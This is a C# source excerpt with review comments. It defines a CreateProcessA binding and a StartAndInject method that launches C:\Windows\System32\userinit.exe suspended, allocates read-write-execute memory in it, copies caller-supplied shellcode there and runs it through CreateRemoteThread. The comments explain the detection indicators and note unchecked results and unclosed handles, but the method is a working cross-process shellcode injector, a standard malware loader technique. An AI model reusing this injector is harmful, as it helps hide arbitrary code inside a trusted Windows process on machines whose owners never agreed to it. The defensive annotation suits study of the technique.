// P/Invoke binding for the ANSI variant of Win32 CreateProcess (the DllImport attribute and the
// enclosing WinAPI class header are outside this excerpt). Structs.* marshalling types are
// project-defined and not shown here.
// NOTE(review): the Win32 function returns a BOOL, but this declaration types the return as IntPtr,
// so the value a caller receives is a marshalled status word, not a handle.
public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, Structs.SecurityAttributes lpProcessAttributes, Structs.SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, Structs.CreateProcessFlags dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, [In] Structs.StartupInfo lpStartupInfo, out Structs.ProcessInformation lpProcessInformation );
// Spawns a suspended copy of C:\Windows\System32\userinit.exe and runs `shellcode` inside it via a
// remote thread. The sequence visible in this method is:
//   1. CreateProcessA with CREATE_SUSPENDED (handles inherited, default environment and cwd);
//   2. VirtualAllocEx in the child, allocation type MEM_COMMIT, protection PAGE_EXECUTE_READWRITE;
//   3. WriteProcessMemory copying `shellcode` into that region;
//   4. CreateRemoteThread whose start address is the region itself.
// From a defender's side this CreateProcess(SUSPENDED) -> RWX VirtualAllocEx -> WriteProcessMemory
// -> CreateRemoteThread chain is the canonical cross-process injection pattern that host-based
// telemetry (ETW thread/memory-protection providers, EDR API monitoring) keys on; an RWX region
// and a cross-process thread start inside a System32-hosted child are low-false-positive indicators.
// Review observations (code left unchanged): the CreateProcessA result is stored in `funcAddr` and
// never examined; `bWrite`, `bytesWritten` and the handle returned by CreateRemoteThread are
// ignored; `pInfo.hProcess` / `pInfo.hThread` are never closed. WinAPI.VirtualAllocEx,
// WinAPI.WriteProcessMemory, WinAPI.CreateRemoteThread and the MEM_COMMIT /
// PAGE_EXECUTE_READWRITE constants are declared outside this excerpt.
public static void StartAndInject(byte[] shellcode) {
    string binary = "userinit.exe";
    Int32 size = shellcode.Length;
    // dwFlags = 0: no STARTF_* options, so the child inherits default window/handle settings.
    Structs.StartupInfo sInfo = new Structs.StartupInfo();
    sInfo.dwFlags = 0;
    Structs.ProcessInformation pInfo;
    // Hard-coded absolute path; no search-path lookup is performed.
    string binaryPath = "C:\\Windows\\System32\\" + binary;
    // Child is created suspended; `funcAddr` holds the (IntPtr-typed) status, not a function address.
    IntPtr funcAddr = WinAPI.CreateProcessA(binaryPath, null, null, null, true, Structs.CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
    IntPtr hProcess = pInfo.hProcess;
    // Lets the OS pick the base address (new IntPtr(0)); region is committed as RWX.
    IntPtr spaceAddr = WinAPI.VirtualAllocEx(hProcess, new IntPtr(0), (uint)size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    UIntPtr bytesWritten;
    // `size2` carries the same value as `size` (shellcode.Length), just boxed as IntPtr.
    IntPtr size2 = new IntPtr(shellcode.Length);
    bool bWrite = WinAPI.WriteProcessMemory(hProcess, spaceAddr, shellcode, (uint)size2, out bytesWritten);
    // Thread attributes, stack size, parameter and creation flags are all zero/default;
    // the thread starts at `spaceAddr`. The returned thread handle is discarded.
    WinAPI.CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
}